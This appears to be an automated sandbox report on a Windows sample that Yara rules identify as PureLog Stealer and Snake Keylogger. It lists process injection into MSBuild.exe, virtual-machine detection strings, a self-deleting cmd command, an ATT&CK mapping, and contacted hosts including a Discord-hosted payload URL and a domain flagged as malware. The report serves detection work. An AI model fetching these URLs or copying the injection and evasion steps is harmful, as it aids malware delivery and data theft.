Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: sssssssssssssssss.exe, 00000008.00000002.2767908241.000001D296CE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Pnihosiyvr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000 value starts with: 4D5A	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Thread register set: target process: 2128	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Thread register set: target process: 5640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Thread register set: target process: 5408	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140002000	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140022000	Jump to behavior
Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 918582F010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140002000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140022000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 6929A52010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140002000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 140022000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe base: 32814E5010	Jump to behavior

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Queries volume information: C:\Users\user\Desktop\Pnihosiyvr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Queries volume information: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Queries volume information: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe VolumeInformation

Source: C:\Users\user\Desktop\Pnihosiyvr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d211fd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d23a008.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d6ea0e8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d28a040.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a3456f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a3456f0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d6ea0e8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d211fd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d28a040.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d23a008.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2327536841.000001A33D6EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2333090134.000001A3456F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2327536841.000001A33CFF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5408, type: MEMORYSTR

Source: Yara match	File source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d211fd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d23a008.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d6ea0e8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d28a040.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a3456f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a3456f0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d6ea0e8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d211fd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d28a040.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d23a008.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2327536841.000001A33D6EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2333090134.000001A3456F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2327536841.000001A33CFF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 3.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.sssssssssssssssss.exe.20a90de1538.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.sssssssssssssssss.exe.20a90de1538.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d992d00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95d0d00.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sssssssssssssssss.exe.1d2a95824c8.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d91ac90.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Pnihosiyvr.exe.1a33d942cc8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pnihosiyvr.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 6136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sssssssssssssssss.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5408, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	1 Masquerading	OS Credential Dumping	1 Query Registry	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	41 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	311 Process Injection	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	12 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Pnihosiyvr.exe	39%	ReversingLabs	Win64.Trojan.CrypterX
Pnihosiyvr.exe	56%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	39%	ReversingLabs	Win64.Trojan.CrypterX
C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	56%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
reallyfreegeoip.org	1%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
http://crl.microsoftS	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/156.146.36.197	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/P6	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/156.146.36.197p	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/A	0%	Avira URL Cloud	safe
https://scratchdreams.tk	15%	Virustotal		Browse
http://checkip.dyndns.org/A	0%	Virustotal		Browse
http://checkip.dyndns.org/P6	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	0%, Virustotal, Browse	unknown
cdn.discordapp.com	162.159.135.233	true	false		high
reallyfreegeoip.org	172.67.177.134	true	false	1%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	true	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	true	URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=6628a743&is=66163243&hm=e36bea9e5aea3063f473ba3c29865ff160adc592430b1e4958d27899b61679dc&	false		high
https://reallyfreegeoip.org/xml/156.146.36.197	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC78000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CFB1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298BD0000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/attachments/1223189307423064096/1227506231204253746/Vfjvqmgnpj.mp3?ex=662	Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Pnihosiyvr.exe, 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
